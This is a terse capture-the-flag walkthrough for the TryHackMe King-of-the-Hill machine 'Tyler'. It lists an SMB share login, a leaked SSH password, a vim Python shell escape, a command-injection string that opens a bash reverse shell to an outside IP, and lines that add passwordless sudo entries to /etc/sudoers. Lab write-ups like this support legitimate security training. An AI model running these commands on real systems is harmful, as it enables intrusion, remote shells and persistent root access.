Tyler

TryHackMe KoTH Machine - Tyler

Initial access

smbclient //tyler.thm/public

We can get narrator's ssh password

username: narrator password: X8JEETQmf3hkS65f

Privilege escalation of user narrator

vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

tdurden;bash -i >& /dev/tcp/10.8.91.66/8888 0>&1

http://tyler.thm:5000

echo 'narrator ALL=(ALL:ALL) NOPASSWD: ALL' >> /etc/sudoers

echo 'tdurden ALL=(ALL:ALL) NOPASSWD: ALL' >> /etc/sudoers

Last updated 7 months ago